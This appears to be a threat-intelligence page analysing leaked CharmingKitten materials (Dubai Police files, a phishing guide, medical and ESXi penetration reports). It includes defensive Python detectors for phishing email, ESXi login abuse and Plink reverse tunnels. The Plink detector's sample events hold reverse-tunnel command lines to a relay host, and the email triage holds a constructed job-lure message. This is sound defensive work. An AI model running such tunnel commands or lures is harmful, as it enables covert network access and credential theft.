
Additional Materials

Beyond the infrastructure documentation, Episode 4 includes several critical additional materials that provide insight into CharmingKitten’s operational methods, targets, and capabilities.

Overview

This episode contains three major categories of additional materials:
  1. Dubai Police materials - Documents obtained by the group from Dubai Police systems
  2. Phishing operations guide - Internal documentation on the group’s phishing techniques
  3. Penetration testing reports - Technical reports and proposals concerning medical-sector targets and VMware ESXi infrastructure

Dubai Police Materials

Files Included

A1_AsImages.pdf - 1 page document
A2_AsImages.pdf - 12 page document
These PDF files contain materials that CharmingKitten obtained from Dubai Police systems, representing a significant compromise of law enforcement infrastructure. The _AsImages suffix indicates the pages are rasterized scans rather than text PDFs, so searching them or extracting indicators from them requires OCR first.

Significance

The presence of Dubai Police materials indicates the following (the files themselves do not show whether they were taken by a direct intrusion into police systems or from the compromised mailbox or device of someone who held them):

Operational Targeting

  • Law enforcement compromise - CharmingKitten successfully penetrated Dubai Police systems
  • UAE operations - Active targeting of United Arab Emirates government entities
  • Intelligence collection - Gathering sensitive law enforcement information
  • Regional focus - Part of broader Middle East and Gulf region targeting

Intelligence Value

Dubai Police materials could provide:
  • Investigations intelligence - Information on ongoing police investigations
  • Personnel data - Details on law enforcement officers and officials
  • Operational procedures - Understanding of police capabilities and methods
  • Counter-intelligence - Identifying targets of police investigations related to Iran
  • Strategic planning - Intelligence for broader IRGC operations in the UAE

Attribution Context

This aligns with previously documented CharmingKitten targeting:
  • UAE government entities
  • Gulf Cooperation Council (GCC) countries
  • Law enforcement and intelligence organizations
  • Middle Eastern government infrastructure
The infrastructure sheets also document operations targeting the UAE, including the AMEEN ALKHALIJ server (mentioned in Episode 2):
  • Website established to recruit former UAE government and security employees
  • Server logs exposed in previous releases
  • Part of broader UAE targeting campaign

Operational Timeline

The Dubai Police compromise represents:
  • Long-term access - Materials suggest sustained compromise
  • Data exfiltration - Successfully extracted documents from internal systems
  • Storage in infrastructure - Files stored on CharmingKitten file servers
  • Documentation for reporting - Materials prepared for IRGC-IO leadership

Defensive Implications

For UAE and regional security organizations:
  1. Incident response - Dubai Police should conduct a comprehensive forensic investigation, including of the mailboxes and endpoints of staff who handled the leaked documents
  2. Information assessment - Determine what data was compromised
  3. Personnel security - Protect individuals whose information may have been exposed
  4. Investigation impact - Assess if ongoing investigations were compromised
  5. Regional coordination - Share findings with other GCC countries

Phishing Operations Guide

Overview

The “Group’s Phishing Guide” is an internal document detailing CharmingKitten’s phishing techniques, procedures, and best practices. This represents operational doctrine for one of their primary attack vectors.

Key Components

The complete guide still requires detailed analysis; based on CharmingKitten's publicly documented tradecraft, it is expected to cover:

Target Selection

  • Victim profiling - Methods for selecting high-value targets
  • Social media reconnaissance - Gathering intelligence from LinkedIn, Twitter, Facebook
  • Email address harvesting - Techniques for obtaining target email addresses
  • Organizational research - Understanding target organizations and hierarchies
  • Trust relationship mapping - Identifying relationships to exploit

Pretexting Techniques

  • Persona development - Creating convincing fake identities
  • Job recruitment lures - Using job opportunities as phishing themes (as seen in dreamy-jobs.com, israel-talent.com)
  • Conference invitations - Fake event and conference communications
  • Journalist impersonation - Posing as media for interview requests
  • Academic outreach - University and research collaboration lures
  • Government impersonation - Posing as official entities

Technical Methods

  • Credential harvesting - Fake login pages for email and social media
  • Malware delivery - Techniques for distributing BELLACIAO and other tools
  • Link shortening - Using URL shorteners to hide malicious domains
  • Email spoofing - Techniques for sender impersonation
  • Multi-stage attacks - Building trust before delivering payload

Infrastructure Usage

  • Domain selection - Choosing convincing domain names (as documented in infrastructure sheets)
  • TLS certificates - Obtaining valid certificates so phishing pages load without browser warnings
  • Hosting selection - Using privacy-focused providers (TheOnionHost, Impreza, PRQ)
  • Email services - ProtonMail and other services for operational accounts
  • Backup infrastructure - Maintaining redundant phishing sites

Operational Security

  • Identity protection - Using procurement identities and fake personas
  • Payment anonymity - Bitcoin and other anonymous payment methods
  • Communication security - Using ISABELLE, 3CX, and Signal
  • Access via Tor - Maintaining anonymity when accessing infrastructure
  • Compartmentalization - Limiting knowledge across team members

Documented Phishing Infrastructure

The infrastructure sheets show numerous phishing operations:

Job-Themed Phishing

  • dreamy-jobs.com - Generic job opportunities
  • wazayif-halima.org - Arabic job site (wazayif = jobs)
  • israel-talent.com / israel-talent.xyz - Israeli job recruitment
  • cavinet.org - Professional networking

Regional Targeting

  • bbmovements.com - Social movement themed
  • secnetdc.com - Technology/security themed
  • tecret.com - Technology themed

Influence Operations

  • moses-staff.io / moses-staff.to / moses-staff.se - Moses Staff leak and influence sites across several TLDs
  • abrahams-ax.se - Abraham's Ax persona, publicly assessed as linked to Moses Staff
  • termite.nu - Alternative operation name

Evolution of Techniques

The phishing guide likely reflects years of operational experience:
  • Lessons learned - Adapted from successful and failed campaigns
  • Target responses - Understanding victim behavior and responses
  • Detection avoidance - Techniques to bypass security controls
  • Countering awareness training - Lures crafted to survive security awareness training
  • Scale operations - Methods for running multiple simultaneous campaigns

Defensive Recommendations

Organizations should use this intelligence to:
  1. Update training - Educate employees on CharmingKitten’s specific techniques
  2. Email security - Implement controls for common phishing patterns
  3. URL filtering - Block known infrastructure and similar patterns
  4. Monitoring - Watch for reconnaissance and pretexting attempts
  5. Incident response - Prepare procedures for suspected CharmingKitten activity
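To make the URL-filtering and monitoring recommendations above concrete, here is an added example (not part of the original page or of any CharmingKitten material) that triages a raw RFC 822 message against the phishing patterns described in the Technical Methods and Documented Phishing Infrastructure sections. The watchlist is the set of domains named on this page; the shortener list, the lure vocabulary, the scoring weights and the two sample messages are constructed assumptions.

```python
"""Triage an inbound message against the CharmingKitten phishing patterns
described on this page.  Added example: WATCHLIST is the set of domains
documented above; everything else (shorteners, lure words, weights,
sample messages) is an assumption made for the demonstration."""
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

# Phishing domains listed in the infrastructure sheets (see above).
WATCHLIST = {
    "dreamy-jobs.com", "wazayif-halima.org", "israel-talent.com",
    "israel-talent.xyz", "cavinet.org", "bbmovements.com", "secnetdc.com",
    "tecret.com",
}
# Assumed: public shorteners that hide the final landing domain.
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "rebrand.ly", "cutt.ly"}
# Assumed: vocabulary of the job, conference and interview pretexts.
LURE_WORDS = ("job", "talent", "recruit", "position", "interview",
              "conference", "invitation", "وظائف")
# Assumed weights: a documented-domain hit alone is enough to block.
WEIGHTS = {"watchlist_domain": 10, "auth_fail": 4, "reply_to_mismatch": 3,
           "url_shortener": 2, "lure_keywords": 2}

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)
AUTH_FAIL_RE = re.compile(r"\b(spf|dkim|dmarc)=fail\b", re.IGNORECASE)


def domain_of(url: str) -> str:
    return (urlparse(url).hostname or "").lower().rstrip(".")


def on_watchlist(domain: str) -> bool:
    """Exact match or any subdomain of a documented domain."""
    return any(domain == d or domain.endswith("." + d) for d in WATCHLIST)


def body_text(msg) -> str:
    """Concatenate the text/plain parts (single-part or multipart)."""
    parts = msg.walk() if msg.is_multipart() else [msg]
    chunks = []
    for part in parts:
        if part.get_content_type() == "text/plain":
            raw = part.get_payload(decode=True) or b""
            chunks.append(raw.decode(part.get_content_charset() or "utf-8", "replace"))
    return "\n".join(chunks)


def triage(raw_message: str) -> dict:
    msg = message_from_string(raw_message)
    findings = []

    # 1. Links: documented infrastructure, then shortener indirection.
    for url in URL_RE.findall(body_text(msg)):
        dom = domain_of(url)
        if on_watchlist(dom):
            findings.append(("watchlist_domain", dom))
        elif dom in SHORTENERS:
            findings.append(("url_shortener", dom))

    # 2. Reply-To on a different domain than From: the persona answers from
    #    a mailbox it controls while the From header is only for display.
    from_dom = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    reply_dom = parseaddr(msg.get("Reply-To", ""))[1].rpartition("@")[2].lower()
    if reply_dom and reply_dom != from_dom:
        findings.append(("reply_to_mismatch", reply_dom))

    # 3. Pretext vocabulary in the subject line.
    subject = msg.get("Subject", "").lower()
    hits = [w for w in LURE_WORDS if w in subject]
    if hits:
        findings.append(("lure_keywords", ",".join(hits)))

    # 4. Sender-authentication failures recorded by the receiving MTA.
    m = AUTH_FAIL_RE.search(msg.get("Authentication-Results", ""))
    if m:
        findings.append(("auth_fail", m.group(1).lower()))

    score = sum(WEIGHTS[kind] for kind, _ in findings)
    verdict = "block" if score >= 10 else "review" if score >= 4 else "allow"
    return {"score": score, "verdict": verdict, "findings": findings}


# Constructed sample messages (all addresses use reserved example domains).
SAMPLE_LURE = """\
From: "Talent Acquisition" <hr@careers-portal.example>
Reply-To: recruiter-desk@mail.example.net
To: target@victim.example
Subject: Job interview invitation - senior engineer position
Authentication-Results: mx.victim.example; spf=fail smtp.mailfrom=careers-portal.example
Content-Type: text/plain; charset=utf-8

Hello,
Please confirm your availability via https://israel-talent.xyz/apply/8813
or the short link https://bit.ly/3abcxyz before Friday.
"""

SAMPLE_BENIGN = """\
From: colleague@victim.example
To: target@victim.example
Subject: Quarterly report draft
Authentication-Results: mx.victim.example; spf=pass dkim=pass dmarc=pass
Content-Type: text/plain; charset=utf-8

Draft is at https://docs.victim.example/q3/report as discussed.
"""

if __name__ == "__main__":
    for name, sample in (("lure", SAMPLE_LURE), ("benign", SAMPLE_BENIGN)):
        print(name, triage(sample))
```

The watchlist match is deliberately a suffix match so that subdomains of a documented domain are caught while unrelated domains that merely contain the string are not; in production the list would be fed from the infrastructure sheets rather than hard-coded, and a shortener hit should trigger URL expansion before the final verdict.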

Penetration Testing Reports

Medical Entity Target

File: طرح پیشنهادی - شرکت های فعال پزشکی مهندسی_AsImages.pdf (6 pages)
Translation: “Proposal - Active Medical Engineering Companies”
This document appears to be a penetration testing report or proposal targeting medical organizations.

ESXi Infrastructure

File: Esxi 6.pdf (10 pages)
This document focuses on VMware ESXi 6.x infrastructure, suggesting:

Target Focus

  • Virtualization infrastructure - Targeting ESXi hypervisors
  • Enterprise environments - Organizations using VMware for server virtualization
  • Hypervisor control - Root on an ESXi host means control over every VM's disks, memory and console, beneath any guest OS security controls
  • Persistence capabilities - Hypervisor-level access for long-term compromise that reimaging the guests does not remove

Technical Capabilities

ESXi targeting demonstrates:
  • Advanced technical skills - Understanding of virtualization infrastructure
  • Enterprise targeting - Focus on larger organizations
  • Lateral movement - ESXi as pivot point to other systems
  • Data access - Visibility into all VMs running on the hypervisor
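Because root on the hypervisor sits beneath every guest's controls, a practitioner responding to an ESXi-focused document wants a quick answer to who has been logging into the hosts. The following is an added example, not material from the page or from CharmingKitten: it reviews an ESXi host's /var/log/auth.log for root logins from outside the management network and for password-guessing bursts that end in success. The log lines are constructed in the OpenSSH "Accepted ... for USER from IP port N ssh2" format that ESXi's sshd writes (an optional severity token such as In(38) before sshd[ is tolerated); the management subnet and the thresholds are assumptions.

```python
"""Review an ESXi host's auth.log for hypervisor-level access abuse.
Added example: constructed log lines, assumed management subnet and
thresholds; not material from the page."""
import ipaddress
import re
from datetime import datetime, timedelta

MGMT_NETS = [ipaddress.ip_network("10.20.0.0/24")]   # assumed admin jump subnet
FAIL_THRESHOLD = 5                                   # failures per source ...
FAIL_WINDOW = timedelta(minutes=5)                   # ... inside this window

# OpenSSH auth line as written by ESXi's sshd; the optional token before
# 'sshd[' absorbs the severity field newer ESXi releases insert.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\dZ)\s+(?:\S+\s+)?sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) \S+ for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse(line: str):
    """Return a dict for an Accepted/Failed login line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
        "result": m["result"],
        "user": m["user"],
        "ip": m["ip"],
    }


def analyse(log_text: str) -> list:
    alerts = []
    recent_failures = {}  # source ip -> failure timestamps inside FAIL_WINDOW
    for line in log_text.splitlines():
        ev = parse(line)
        if ev is None:
            continue
        src = ev["ip"]
        if ev["result"] == "Failed":
            window = [t for t in recent_failures.get(src, [])
                      if ev["ts"] - t <= FAIL_WINDOW]
            window.append(ev["ts"])
            recent_failures[src] = window
            if len(window) == FAIL_THRESHOLD:      # fire once per burst
                alerts.append(("bruteforce", src, ev["user"]))
            continue
        # Accepted login: root on the hypervisor owns every VM's disk,
        # memory and console, so it must originate from the management net.
        ip = ipaddress.ip_address(src)
        if ev["user"] == "root" and not any(ip in net for net in MGMT_NETS):
            alerts.append(("root_login_outside_mgmt", src, ev["user"]))
        if len(recent_failures.get(src, [])) >= FAIL_THRESHOLD:
            alerts.append(("bruteforce_success", src, ev["user"]))
    return alerts


# Constructed sample: one admin login, then a guessing burst from a
# documentation-range address (198.51.100.0/24) that finally succeeds.
SAMPLE_AUTH_LOG = """\
2024-03-02T08:14:07Z In(38) sshd[2101322]: Accepted keyboard-interactive/pam for root from 10.20.0.15 port 51212 ssh2
2024-03-02T08:15:44Z sshd[2101340]: Failed keyboard-interactive/pam for root from 198.51.100.23 port 40122 ssh2
2024-03-02T08:15:46Z sshd[2101342]: Failed keyboard-interactive/pam for root from 198.51.100.23 port 40124 ssh2
2024-03-02T08:15:48Z sshd[2101344]: Failed keyboard-interactive/pam for root from 198.51.100.23 port 40126 ssh2
2024-03-02T08:15:50Z sshd[2101346]: Failed keyboard-interactive/pam for root from 198.51.100.23 port 40128 ssh2
2024-03-02T08:15:52Z sshd[2101348]: Failed keyboard-interactive/pam for root from 198.51.100.23 port 40130 ssh2
2024-03-02T08:15:54Z sshd[2101350]: Failed keyboard-interactive/pam for root from 198.51.100.23 port 40132 ssh2
2024-03-02T08:16:09Z sshd[2101361]: Accepted keyboard-interactive/pam for root from 198.51.100.23 port 40131 ssh2
2024-03-02T08:16:20Z sshd[2101361]: Received disconnect from 198.51.100.23 port 40131:11: disconnected by user
"""

if __name__ == "__main__":
    for alert in analyse(SAMPLE_AUTH_LOG):
        print(*alert)
```

SSH is disabled on ESXi by default, so on a well-run host the first finding is usually that the service was enabled at all; that change is recorded by hostd rather than in auth.log and belongs in the same review. Forward the host logs to a collector before the incident, since an attacker with root can truncate them locally.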

Medical Sector Targeting

The medical entity reports reveal:

Strategic Focus

  • Healthcare targeting - Medical organizations as intelligence targets
  • Medical engineering - Specific interest in medical technology companies
  • Sensitive data - Patient records, medical research, proprietary technology
  • Iranian context - Possible focus on medical technology Iran seeks to acquire

Regional Implications

Medical targeting aligns with:
  • Technology transfer - Acquiring medical technology and research
  • Sanctions evasion - Understanding medical equipment for procurement
  • Industrial espionage - Stealing proprietary medical technology
  • Dual-use technology - Medical equipment with potential military applications

Report Structure

The two documents have not yet been fully translated; a penetration report of this kind would be expected to include:

Reconnaissance Phase

  • Target identification - Organization selection and justification
  • Infrastructure mapping - Networks, servers, and systems
  • Personnel identification - Key employees and access levels
  • Technology stack - Applications and security controls in use

Exploitation Phase

  • Initial access methods - Phishing, vulnerability exploitation
  • Privilege escalation - Techniques for gaining higher access
  • Lateral movement - Spreading through the network
  • Persistence mechanisms - Maintaining long-term access

Data Collection

  • Sensitive data identified - Types of valuable information found
  • Exfiltration methods - How data was stolen
  • File storage - Where stolen data was uploaded
  • Intelligence value - Assessment for IRGC-IO leadership

Recommendations Section

  • Further exploitation - Suggestions for deeper compromise
  • Additional targets - Related organizations to target
  • Tool improvements - Malware and technique enhancements
  • Operational security - Protecting the compromise from detection

Malware Integration

Penetration reports reference tools exposed in previous episodes:

BELLACIAO Malware (Episode 3)

  • .NET-based dropper with C# webshell
  • PowerShell reverse proxy using Plink
  • File upload/download capabilities
  • Command execution on compromised systems
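The Plink-based reverse proxy is the most hunt-friendly of the BELLACIAO behaviours listed above, because a tunnel tool launched by PowerShell or by the IIS worker process looks nothing like an administrator's session. The following is an added example, not code from the page, from BELLACIAO or from any vendor report: it applies that logic to constructed Sysmon-style process-creation records. The command lines use generic Plink syntax (-R for a remote forward, -pw for a scripted password), not a copy of the malware's actual invocation, and the OriginalFileName value, the parent-process sets and the sample events are assumptions.

```python
"""Hunt process-creation telemetry for Plink reverse-tunnel launches of the
kind attributed to BELLACIAO.  Added example: the events are constructed
Sysmon-style (Event ID 1) records, not real telemetry; the rule sets and
the PE OriginalFileName value are assumptions."""
from typing import Dict, List

# A tunnel tool spawned by an interpreter is the PowerShell-dropper pattern;
# one spawned by the IIS worker is the webshell pattern.  Neither is an
# admin typing at a console.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
WEB_WORKERS = {"w3wp.exe"}
# Assumed: PE version info of PuTTY's plink.exe carries this OriginalFilename,
# which Sysmon records even when the file on disk has been renamed.
PLINK_ORIGINAL_NAMES = {"plink", "plink.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def looks_like_plink(ev: Dict[str, str]) -> bool:
    return (basename(ev.get("Image", "")) == "plink.exe"
            or ev.get("OriginalFileName", "").lower() in PLINK_ORIGINAL_NAMES)


def detect(ev: Dict[str, str]) -> List[str]:
    """Return the rule names an event triggers (empty list means benign)."""
    alerts: List[str] = []
    if not looks_like_plink(ev):
        return alerts
    tokens = ev.get("CommandLine", "").split()
    if basename(ev.get("Image", "")) != "plink.exe":
        alerts.append("renamed_plink")          # binary masquerading as something else
    if "-R" in tokens:
        # -R listen:host:port makes the remote (C2) side listen and forwards
        # connections back into the victim network: the reverse proxy.
        alerts.append("plink_reverse_forward")
    if "-pw" in tokens:
        alerts.append("password_on_cmdline")    # unattended, scripted use
    parent = basename(ev.get("ParentImage", ""))
    if parent in SCRIPT_HOSTS:
        alerts.append("scripted_launch")
    if parent in WEB_WORKERS:
        alerts.append("webserver_child")        # spawned by a webshell
    return alerts


def scan(events: List[Dict[str, str]]) -> List[dict]:
    """Return one record per event that triggered at least one rule."""
    hits = []
    for ev in events:
        alerts = detect(ev)
        if alerts:
            hits.append({"pid": ev.get("ProcessId"), "image": ev.get("Image"),
                         "alerts": alerts})
    return hits


# Constructed sample events (198.51.100.0/24 is documentation address space).
SAMPLE_EVENTS = [
    {"ProcessId": "4120", "Image": r"C:\Users\Public\plink.exe",
     "OriginalFileName": "Plink",
     "CommandLine": r"plink.exe -ssh -N -batch -P 443 -pw REDACTED -R 8443:127.0.0.1:443 relay@198.51.100.7",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"ProcessId": "5208", "Image": r"C:\Windows\Temp\svchost.exe",
     "OriginalFileName": "Plink",
     "CommandLine": r"svchost.exe -ssh -N -batch -R 2222:127.0.0.1:3389 relay@198.51.100.7",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe"},
    {"ProcessId": "6011", "Image": r"C:\Program Files\PuTTY\plink.exe",
     "OriginalFileName": "Plink",
     "CommandLine": r"plink.exe -ssh -L 5432:db.internal:5432 admin@jump.internal",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The third event is a local forward (-L) started interactively from Explorer and produces no alert, which is the point: the rules key on the reverse direction and on who launched the tool, not on Plink's presence. A renamed copy still matches through OriginalFileName, so the check survives the masquerading seen in the second event.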

CYCLOPS Malware

  • Additional tooling referenced in public reporting
  • Infrastructure overlap with documented servers
  • Multi-campaign usage across different targets

Python & Webshells Framework

  • Custom webshells for specific targets
  • Command management interface
  • Output relay systems for exfiltrated data

TAGHEB System

  • Windows-focused infection system
  • Access maintenance tooling
  • Integration with penetration operations

Anti-Virus Testing

Reports likely include testing against security products:
  • Microsoft Defender - Windows built-in protection
  • Kaspersky - Enterprise and consumer products
  • Avira - German antivirus solution
  • ESET - European security vendor
  • Other products - Comprehensive AV evasion testing

Intelligence Value

These additional materials provide:

Operational Understanding

  • Complete attack lifecycle - From phishing to penetration to reporting
  • Tool integration - How different malware and techniques are combined
  • Targeting priorities - Which sectors and organizations are of interest
  • Intelligence requirements - What data IRGC-IO leadership seeks

Attribution Evidence

  • Consistent infrastructure - Same servers used across all operations
  • Personnel continuity - Same individuals managing multiple campaigns
  • IRGC-IO connection - Reports prepared for Iranian intelligence leadership
  • Unit 1500 tasking - Counterintelligence division requirements

Defensive Intelligence

  • Phishing techniques - Specific methods to defend against
  • Infrastructure patterns - Predictable procurement and hosting choices
  • Technical capabilities - Understanding of their malware and tools
  • Target selection - Which organizations are at risk

Moses Staff Campaign

The infrastructure and techniques documented support the Moses Staff influence operation:
  • Destructive operations - Leaked data and defacement
  • Psychological operations - Threatening messaging and intimidation
  • Regional targeting - Focus on Israel and Middle East
  • Attribution deception - Attempting to hide Iranian connection

Multi-Country Targeting

Documented targets span multiple countries:
  • United Arab Emirates - Dubai Police compromise
  • Israel - Job phishing and talent recruitment
  • Turkey - Foreign Ministry attacks (Episode 3)
  • Saudi Arabia - Documented in Episode 2
  • Jordan, Kuwait, Qatar - Previous episode reporting
  • Iran - Regime opponents and dissidents

Analysis Recommendations

Security researchers should:
  1. Detailed document analysis - Extract IOCs and TTPs from all materials
  2. Cross-reference campaigns - Link these materials to known CharmingKitten operations
  3. Victim notification - Inform organizations that appear in penetration reports
  4. Tool comparison - Compare described techniques to observed malware behavior
  5. Timeline construction - Build comprehensive timeline of operations
  6. Share findings - Contribute analysis to threat intelligence community

Victim Support

Organizations that may have been targeted should take the following steps:

Immediate Actions

  1. Forensic investigation - Comprehensive analysis of systems and networks
  2. Credential reset - Change all passwords and access credentials
  3. Incident response - Engage IR team to hunt for compromise indicators
  4. Data assessment - Determine what information may have been accessed
  5. Legal notification - Comply with breach notification requirements

Long-Term Security

  1. Architecture review - Assess and improve security controls
  2. Monitoring enhancement - Implement detection for CharmingKitten TTPs
  3. Security training - Educate staff on this specific threat
  4. Threat intelligence - Subscribe to CharmingKitten-focused intelligence feeds
  5. Information sharing - Participate in sector-specific threat sharing

Beyond defensive action, the exposure also supports:

Sanctions Enforcement

  • Individual sanctions - Against exposed operatives
  • Entity sanctions - Against IRGC-IO and Unit 1500
  • Front company designations - JARF/ZHARF ANDISHAN TAFACOR SEFID

Diplomatic Actions

  • Formal protests - To Iranian government regarding cyber operations
  • International cooperation - Joint response with targeted countries
  • Attribution statements - Public attribution to IRGC-IO
  • Indictments - Criminal charges in affected countries
  • International warrants - Interpol red notices
  • Civil litigation - Lawsuits by affected organizations

Conclusion

The additional materials in Episode 4 complement the infrastructure exposure by providing:
  • Operational context - Understanding how infrastructure is used
  • Victim evidence - Proof of specific compromises and targets
  • Capability demonstration - Technical sophistication and methods
  • Intelligence value - IRGC-IO collection requirements and priorities
Together with the infrastructure sheets and personnel exposure, these materials provide the most comprehensive look yet at CharmingKitten’s operations under IRGC-IO control.

Next Episodes

Stay tuned for future episodes with additional exposures of:
  • More personnel identities
  • Additional operational materials
  • Further infrastructure details
  • Malware source code
  • Attack reports and victim data
